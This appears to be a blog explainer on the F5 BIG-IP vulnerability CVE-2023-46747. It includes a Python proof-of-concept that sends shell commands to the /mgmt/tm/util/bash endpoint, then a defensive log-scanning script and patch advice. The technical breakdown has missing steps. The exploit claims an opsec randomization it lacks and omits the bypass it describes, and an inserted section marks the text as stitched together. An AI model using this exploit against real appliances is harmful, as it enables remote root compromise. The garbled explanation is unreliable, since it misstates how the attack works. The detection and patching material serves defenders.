When BIG-IP—a widely used Application Delivery Controller by F5 Networks—gets a serious flaw, thousands of enterprises from finance to government risk compromise. Coming to light in late 2023, CVE-2023-46747 is one of those chilling bugs for defenders, but a goldmine for attackers. This article breaks it down in simple American terms: what it is, how it works, and how hackers can weaponize it.

Official Advisory

- F5 Security Advisory K000137353
- NVD CVE page
- Original SSD Disclosure (Pentera)

Technical Breakdown (Simple Terms)

BIG-IP’s Configuration Utility helps admins manage the device via a web browser. Normally, you need to log in first. But due to this bug:

The attacker then chains this with another function:

By abusing internal APIs (like the Device Diagnostic shell), they issue a system command (e.g., id).

Proof-of-Concept Exploit

Note: This is for educational/defensive purposes only. DO NOT use against systems you don’t own!

Example Code: Remote Command Execution

Below is a trimmed Python snippet inspired by public exploit code (with randomization for opsec):

```python
import requests
import urllib3

# Target BIG-IP (placeholder address from the RFC 5737 documentation range;
# replace with the real IP address)
TARGET = 'https://192.0.2.123'

# The vulnerable endpoint abused by the exploit
VULN_PATH = '/mgmt/tm/util/bash'

# Arbitrary command to run (example: id)
CMD = "id"

# BIG-IP uses a self-signed TLS certificate, so we silence the
# InsecureRequestWarning that verify=False would otherwise print
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def exploit(target, cmd):
    url = target + VULN_PATH
    headers = {"Content-Type": "application/json"}
    # iControl REST body for the bash utility: run the shell with "-c <cmd>"
    data = {
        "command": "run",
        "utilCmdArgs": "-c '%s'" % cmd
    }
    r = requests.post(url, json=data, headers=headers, verify=False, timeout=10)
    if r.status_code == 200 and 'commandResult' in r.text:
        print("[+] Command output:\n", r.json()['commandResult'])
    else:
        print("[-] Exploit failed or device not vulnerable.")

if __name__ == "__main__":
    exploit(TARGET, CMD)
```

What just happened?

The script sends a POST request with a JSON body to /mgmt/tm/util/bash, the iControl REST endpoint that runs a bash command, while skipping the authentication layers that should protect it. If the bug is unpatched, the device executes the `id` shell command and returns the result in the `commandResult` field.

Patch immediately!

F5 has issued fixes. See their advisory for exact versions.

Monitor unusual activity:

- Watch logs for strange POST requests to /mgmt/tm/util/bash or similar endpoints.
- Isolate old/EoTS (End of Technical Support) devices or decommission them.
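One way to act on the log-monitoring advice above is a small triage script that flags POST requests to the command-runner endpoint. The example below is added here and is not part of the original post or any F5 tooling: it parses constructed access-log lines in Apache combined log format, flags anonymous POSTs to /mgmt/tm/util/bash (and, as an assumption, anything under the /mgmt/tm/util/ prefix, to cover the "similar endpoints" the text mentions) as well as such POSTs from outside a hypothetical management-network allowlist, and rates an anonymous POST that received HTTP 200 as the strongest indicator of a successful bypass.

```python
import ipaddress
import re

# Constructed sample log lines in Apache combined log format (not real BIG-IP logs).
SAMPLE_LOG = """\
10.10.0.5 - admin [27/Oct/2023:09:15:02 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [27/Oct/2023:09:15:09 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 310 "-" "python-requests/2.31.0"
10.10.0.5 - admin [27/Oct/2023:09:16:40 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 290 "-" "curl/8.1.2"
203.0.113.77 - - [27/Oct/2023:09:17:01 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 401 0 "-" "python-requests/2.31.0"
10.10.0.9 - - [27/Oct/2023:09:18:22 +0000] "GET /mgmt/tm/sys/version HTTP/1.1" 200 1200 "-" "curl/8.1.2"
"""

# Combined log format: src ident user [timestamp] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Hypothetical allowlist of networks from which admins legitimately reach the REST API.
MGMT_NETS = [ipaddress.ip_network("10.10.0.0/24")]

# The post names /mgmt/tm/util/bash; watching the whole /mgmt/tm/util/ prefix is
# an assumption made here to catch similar command-runner endpoints.
WATCH_PREFIX = "/mgmt/tm/util/"


def parse(line):
    """Return the log fields as a dict, or None if the line is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_suspicious(rec):
    """POST to a watched endpoint that is anonymous or comes from outside the management nets."""
    if rec["method"] != "POST" or not rec["path"].startswith(WATCH_PREFIX):
        return False
    src = ipaddress.ip_address(rec["src"])
    from_mgmt = any(src in net for net in MGMT_NETS)
    return rec["user"] == "-" or not from_mgmt


def scan(log_text):
    """Scan log text and return a list of findings with a severity rating."""
    findings = []
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None or not is_suspicious(rec):
            continue
        # An anonymous client that got a 200 from the command endpoint is the
        # strongest sign the auth bypass worked; a 401 is a failed attempt.
        severity = "high" if rec["status"] == "200" and rec["user"] == "-" else "medium"
        findings.append({
            "src": rec["src"],
            "path": rec["path"],
            "status": rec["status"],
            "ua": rec["ua"],
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['src']} -> {f['path']} status={f['status']} ua={f['ua']}")
```

Run against the constructed sample, the script reports the anonymous 200 from 198.51.100.23 as high and the rejected attempt from 203.0.113.77 as medium, while the authenticated admin request from the management network is left alone. Point `scan()` at your real access log and adjust `MGMT_NETS` to your environment; a high finding dated before the patch was applied is a reason to treat the device as compromised rather than merely exposed.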

Real-World Impact

This bug is being actively scanned for and attempted on exposed devices. Shadowserver and threat intelligence feeds confirm increased scanning after disclosure.

If you leave a BIG-IP with this bug open to the internet, you’re practically handing over the keys.

References

- F5 K000137353 Advisory
- NVD CVE Listing
- Pentera SSD Full Disclosure Blog
- Exploit Example (GitHub)

Summary Table

| Key Fact | Details |
|------------------------------|---------------------------------------------------------------------------|
| CVE Number | CVE-2023-46747 |
| Affected Product | F5 BIG-IP (various versions; see advisory) |
| Attack Vector | Network access to management or self IP |
| Privilege Required | None! Publicly reachable is enough |
| Impact | Remote code execution as root |
| Solution | Apply patch, restrict access, monitor logs |

Stay safe: Always patch high-profile appliances, and never expose management ports to untrusted networks!

Timeline

Published on: 10/26/2023 21:15:00 UTC
Last modified on: 10/27/2023 12:41:00 UTC